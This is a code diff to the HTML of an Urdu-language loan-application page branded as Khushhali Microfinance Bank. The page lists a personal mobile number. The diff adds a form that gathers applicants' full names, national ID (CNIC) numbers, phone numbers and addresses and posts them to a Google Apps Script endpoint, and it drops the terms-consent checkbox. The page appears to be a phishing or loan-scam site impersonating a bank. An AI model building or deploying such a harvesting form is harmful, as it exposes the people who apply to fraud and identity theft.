--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
             <div class="hero-content">
                 <h1>خوشحالی سرمایہ – اپنے خوابوں کو حقیقت میں بدلیں!</h1>
                 <p class="hero-text">اگر آپ اپنے کاروبار کو بڑھانے کے زبردست آئیڈیاز رکھتے ہیں، لیکن سرمایہ کی کمی رکاوٹ بنی ہوئی ہے، تو گھبرائیں نہیں!</p>
-                <button class="apply-now">ابھی اپلائی کریں</button>
+                <button class="apply-now" onclick="openModal()">ابھی اپلائی کریں</button>
             </div>
         </section>
 
@@ -80,7 +80,7 @@
                     <p><i class="fas fa-phone"></i> 0346-0408190</p>
                     <p><i class="fas fa-globe"></i> Khushhali Microfinance Bank</p>
                 </div>
-                <button class="apply-now">ابھی اپلائی کریں</button>
+                <button class="apply-now" onclick="openModal()">ابھی اپلائی کریں</button>
             </div>
         </section>
     </main>
@@ -89,12 +89,13 @@
         <p>© 2025 خوشحالی مائیکروفنانس بینک - تمام حقوق محفوظ ہیں</p>
     </footer>
 
-    <!-- Modal Form -->
+    <!-- Loan Application Modal -->
     <div id="applicationModal" class="modal">
         <div class="modal-content">
-            <span class="close-modal">&times;</span>
+            <span class="close-modal" onclick="closeModal()">&times;</span>
             <h2>کاروباری قرض کے لیے درخواست</h2>
-            <form id="loanApplicationForm" class="application-form">
+            <form id="loanApplicationForm" action="https://script.google.com/macros/s/AKfycby7shrEnKpM3Mepq8zjOaUFDQ9t7F8FfS6bDIdNXdnuEvKVo2aii-2S0V5YPDBDZusQ/exec" method="POST">
+                
                 <div class="form-group">
                     <label for="fullName">مکمل نام *</label>
                     <input type="text" id="fullName" name="fullName" required>
@@ -102,30 +103,17 @@
 
                 <div class="form-group">
                     <label for="cnic">شناختی کارڈ نمبر *</label>
-                    <input type="text" id="cnic" name="cnic" placeholder="35201-1234567-1" required>
+                    <input type="text" id="cnic" name="cnic" required>
                 </div>
 
                 <div class="form-group">
                     <label for="phone">موبائل نمبر *</label>
-                    <input type="tel" id="phone" name="phone" placeholder="0333-1234567" required>
-                </div>
-
-                <div class="form-group">
-                    <label for="businessType">کاروبار کی نوعیت *</label>
-                    <select id="businessType" name="businessType" required>
-                        <option value="">منتخب کریں</option>
-                        <option value="retail">ریٹیل</option>
-                        <option value="wholesale">ہول سیل</option>
-                        <option value="manufacturing">مینوفیکچرنگ</option>
-                        <option value="services">سروسز</option>
-                        <option value="other">دیگر</option>
-                    </select>
+                    <input type="tel" id="phone" name="phone" required>
                 </div>
 
                 <div class="form-group">
                     <label for="loanAmount">درکار قرض کی رقم *</label>
                     <select id="loanAmount" name="loanAmount" required>
-                        <option value="">منتخب کریں</option>
                         <option value="350001-500000">3,50,001 - 5,00,000</option>
                         <option value="500001-750000">5,00,001 - 7,50,000</option>
                         <option value="750001-1000000">7,50,001 - 10,00,000</option>
@@ -133,28 +121,47 @@
                 </div>
 
                 <div class="form-group">
-                    <label for="businessAddress">کاروبار کا پتہ *</label>
+                    <label for="businessAddress">کاروباری پتہ *</label>
                     <textarea id="businessAddress" name="businessAddress" required></textarea>
                 </div>
 
-                <div class="form-group">
-                    <label for="monthlyIncome">ماہانہ آمدنی *</label>
-                    <input type="number" id="monthlyIncome" name="monthlyIncome" min="0" required>
-                </div>
-
-                <div class="form-group checkbox-group">
-                    <input type="checkbox" id="terms" name="terms" required>
-                    <label for="terms">میں شرائط و ضوابط سے متفق ہوں *</label>
-                </div>
+                <input type="hidden" id="submissionDate" name="submissionDate">
 
                 <div class="form-actions">
                     <button type="submit" class="submit-btn">درخواست جمع کریں</button>
-                    <button type="button" class="cancel-btn">منسوخ کریں</button>
                 </div>
             </form>
         </div>
     </div>
 
-    <script src="script.js"></script>
+    <script>
+        // Auto-fill submission date
+        document.getElementById('submissionDate').value = new Date().toISOString().slice(0, 19).replace("T", " ");
+
+        // Open and Close Modal Functions
+        function openModal() {
+            document.getElementById('applicationModal').style.display = 'block';
+        }
+        function closeModal() {
+            document.getElementById('applicationModal').style.display = 'none';
+        }
+
+        // Form Submission without Page Refresh
+        document.getElementById("loanApplicationForm").addEventListener("submit", function(event){
+            event.preventDefault();
+            var form = this;
+
+            fetch(form.action, {
+                method: "POST",
+                body: new FormData(form)
+            }).then(response => response.text())
+            .then(data => {
+                alert("آپ کی درخواست کامیابی سے جمع کر دی گئی ہے!");
+                form.reset();
+                closeModal();
+            }).catch(error => console.error("Error:", error));
+        });
+    </script>
+
 </body>
-                </html>
+                                                                                       </html>
